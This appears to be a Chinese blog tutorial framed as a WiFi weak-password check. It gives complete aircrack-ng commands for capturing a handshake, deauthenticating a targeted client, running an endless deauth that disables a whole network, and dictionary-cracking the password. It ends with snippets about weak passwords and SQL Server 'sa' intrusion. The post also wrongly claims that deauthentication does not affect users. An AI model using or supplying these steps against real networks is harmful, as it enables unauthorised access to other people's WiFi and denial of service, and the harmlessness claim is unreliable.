wifi弱口令檢查(2)

2021-09-09 09:07:29 字數 1804 閱讀 2809

1.無線網絡卡切換到監聽模式  具體參考:

2.airodump-ng wlan0

列出所有的wifi訊號 得到需要破解的wifi對應的mac 如圖 

這裡選取  b0:95:8e:9b:7c:e8這個wifi裝置

3.airodump-ng wlan0 --ivs -c 6 --bssid b0:95:8e:9b:7c:e8 -w test 

抓取wifi的握手資料報 同時使用第4步讓指定使用者斷開 這樣拿到握手包

--ivs 是通過ivs過濾,只保留可以破解密碼的報文.ivs檔案,這樣比較快點

-c 後面跟頻道,如這裡的6 

-w 是將抓取的報文寫入命名為 test 並儲存(之後會在當前資料夾儲存為test-01.ivs)

4.新開乙個shell執行 aireplay-ng -0 200 -c 84:4b:f5:49:53:ba -a b0:95:8e:9b:7c:e8 wlan0

針對指定wifi的mac 指定的使用者進行攻擊 讓使用者斷開wifi 當使用者重連時 第3步中的命令可以抓到握手包

需要注意 由於使用者wifi斷開後會自動重連 所以使用者端基本沒有感覺 也不能對攻擊使用者造成任何影響

-a 是路由器的mac

-c 是需要攻擊的使用者mac

-0 是攻擊次數

5. aircrack-ng -w pass.txt test-01.ivs

-w 是字典檔案

test-01.ivs 是包含握手包的資料報

如果失敗會顯示:got no data packets from target network!

成功會顯示:

1.檢視本地無線網絡卡名稱 

2.列出所有的wifi訊號 airodump-ng wlan0

3.檢視需要攻擊的wifi的 bssid(mac) 和 ch(通道), 這裡選擇wifi的bssid是b0:95:8e:9b:7c:e8  通道是6

4.設定本地網絡卡通道 iwconfig wlan0 channel 6

攻擊整體wifi 

aireplay-ng -0 0 -a b0:95:8e:9b:7c:e8 wlan0   攻擊效果是此wifi不能連線 

-0 是攻擊次數 0表示無限次

wlan0 是本地無線網絡卡名稱

攻擊對應wifi的單一使用者 

1.airodump-ng wlan0 -c 6 --bssid b0:95:8e:9b:7c:e8 得到連線該wifi的使用者mac列表

-c 是通道,如這裡的6

-c 是需要攻擊的使用者mac

-a 是需要攻擊的wifi的bssid

-0 是攻擊次數 0表示無限次 如果設定200 攻擊完200此後將停止,該使用者會自動再次連線上該wifi

wlan0 是本地無線網絡卡名稱

PowerShell批量檢查域密碼弱口令

需求 標題就是需求,想用密碼庫批量檢測一下域內的弱密碼。解決 powershell來實現,不需要第三方工具,不怕被人偷了密碼。本指令碼需要3個檔案,空的即可,位於d pwd下 1 name.csv,儲存需要測試的使用者名稱列表 2 pwd.csv,儲存需要測試的密碼列表 3 name2.csv,儲存...

弱口令總結(什麼是弱口令)

空口令 口令長度小於8 口令不應該為連續的某個字元 qqqqqq 賬號密碼相同 例 root root 口令與賬號相反 例 root toor 口令純數字 例 112312324234,號 口令純字母 例 asdjfhask 口令已數字代替字母 例 hello word,hell0 w0rd 口令採...

sql弱口令入侵

sql弱口令入侵 mssql伺服器sa使用者弱口令入侵是及其經典的一種黑客入侵手法 其成名是在中美黑客大戰的時候,我們的前輩利用它入侵了很多美國鬼 子的伺服器。下面我介紹一下這種入侵的詳細情況。基礎知識 我們在安裝mssql伺服器之後,系統會有個預設的帳號sa 而這個帳號預設又是空密碼。最要命的是這...